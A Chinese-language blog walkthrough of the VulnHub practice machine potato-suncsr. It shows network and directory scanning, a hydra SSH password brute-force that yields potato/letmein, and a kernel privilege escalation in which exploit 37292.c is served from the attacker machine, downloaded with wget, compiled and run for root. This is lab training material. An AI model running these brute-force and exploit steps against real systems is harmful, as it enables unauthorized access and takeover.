首页 > 其他分享 >Vulnhub靶场(potato-suncsr)

Vulnhub靶场(potato-suncsr)

时间:2025-01-06 19:31:09浏览次数:3  
标签:37292 potato 131.185 192.168 Vulnhub suncsr 靶机 ssh

项目地址

https://www.vulnhub.com/entry/potato-suncsr-1,556/

搭建靶机

官网下载.ova文件双击vm打开导入

获取靶机IP kail终端输入

arp-scan -l

获取靶机 IP 192.168.131.185

信息收集

nmap -A -p- 192.168.131.185

dirb http://192.168.131.185/

一个土豆子一个phpinfo

ssh开在7120端口

漏洞探测

打开什么都是土豆;用户名就用potato;利用九头蛇爆破一下密码

爆破出来了

hydra -l potato -P /home/zss/Desktop/zi.txt  -vV -t 16 ssh://192.168.131.185:7120

账号:potato
密码:letmein

连接试试

ssh potato@192.168.131.185 -p 7120

Ok成功登录

查询一下ubuntu的版本;然后去kali查询一下他的漏洞

版本是:ubuntu 14.04

利用searchploit 查看一下版本漏洞

searchploit ubuntu 14.04

漏洞利用

将这个目录复制到当前

cp /usr/share/exploitdb/exploits/linux/local/37292.c .

kali开启对外服务

python3 -m http.server 80

靶机下载一下来

wget http://192.168.131.185/37292.c

将37292.c 编译为可执行文件

gcc 37292.c -o exp

执行exp就可以获取root权限

获取flag

标签:37292,potato,131.185,192.168,Vulnhub,suncsr,靶机,ssh
From: https://blog.csdn.net/m0_68706634/article/details/144970405

相关文章

  • Potato靶机
    靶机ip:192.168.75.135我们还是使用arp-scan-l查找ip第一步信息收集我们访问一下网页只有一个土豆没有什么有用的信息使用dirb扫描一下目录得到了三个页面我们访问一下没有什么有用的信息我们继续扫描一下端口发现页面开启了80端口还开启了7120端......
  • vulnhub靶机--potato
    nat模式打开靶机扫Ip访问IP得到一张土豆页面扫端口nmap-A-p-192.168.146.158发现80和7120端口使用的是ubuntu服务器访问7120端口扫目录爆破ssh7120端口hydrassh://192.168.146.158:7120-lpotato-P/usr/share/wordlists/john.lst-vV-f-t32......
  • vulnhub——Earth靶机
    使用命令在kali查看靶机iparp-scan-l尝试访问ip尝试使用御剑扫描子域名什么也没有尝试扫描端口nmap-Aip获得443端口的域名,以及dnsvim/etc/hostsearth.localterratest.earth.local尝试访问,在kali中访问dirb扫描一下发现子域名尝试访问一下ht......
  • Vulnhub靶场(Earth)
    项目地址https://download.vulnhub.com/theplanets/Earth.ova.torrent搭建靶机官网下载.ova文件双击vm打开导入获取靶机IPkail终端输入arp-scan-l获取靶机IP192.168.131.184信息收集端口扫描sudonmap-sC-sV-p-192.168.131.184可以看到开启22端口,80端......
  • Vulnhub lampCTF4
    0x01:端口扫描主机发现nmap-sn10.10.10.0/24全端口扫描nmap--min-rate10000-p-10.10.10.133UDP扫描nmap-sU--top=2010.10.10.133详细端口扫描nmap-sT-sC-sV-O--min-rate10000-p22,25,80,63110.10.10.133漏洞扫描nmap--script=vuln-p22,25,80,......
  • VULNHUB靶场-matrix-breakout-2-morpheus(1)
    1.直接把靶机拖进虚拟机中,用kali探测IP2.进入浏览器3.查看网页源代码后什么也没有后,扫描端口4.进入81端口5.进入bp爆破后爆破不到账号密码,进入kali进行爆破6.回到浏览器进入到/graffiti.php,有输入框尝试xss,存在xss漏洞 7.进行抓包,看到/graffiti.txt文件后,进......
  • Vulnhub 靶场 Chill Hack: 1
    前期准备靶机地址:https://www.vulnhub.com/entry/chill-hack-1,622/kali攻击机IP:192.168.11.128靶机IP:192.168.11.132一、信息收集1.使用nmap对目标靶机进行扫描开了21(FTP。有个note.txt文件)、22(SSH)和80端口。2.21端口匿名登陆ftp并下载下来note.txt文......
  • VulnHub-Empire_ LupinOne靶场
    1.kali虚拟机扫描端口(虚拟机与靶机均为NAT连接模式)2.登录网址3.扫描下目录,发现一个robots.txt文件4.访问下robots.txt文件5.访问下~myfiles文件6.用wfuzz进行扫描 http://ffuf-c-w/usr/share/wordlists/dirb/common.txt-u‘http://192.168.11.153/~FUZZ’7.......
  • Vulnhub靶场(driftingblues6_vh)
    1.搭建靶机官网地址:https://www.vulnhub.com/entry/driftingblues-6,672/官网下载.ova文件双击vm打开导入获取靶机IPkail终端输入arp-scan-llook一下主页2.信息收集扫描后台目录dirbhttp://192.168.131.179查看目录通过访问robots.txt,我们获得了一个/t......
  • Vulnhub靶场-Driftingblues 6靶机(至获取shell)
    靶机安装好后,照例扫描IP端口目录首页为一个图片,没有什么信息访问robots.txt,存在一个textpattern/textpattern目录,我们访问为一个登录窗口,sqlmap无法注入提示我们扫目录时添加.zip扩展名,所以我们使用gobuster来添加扩展名进行扫描扫描到了spammer.zip和spammer......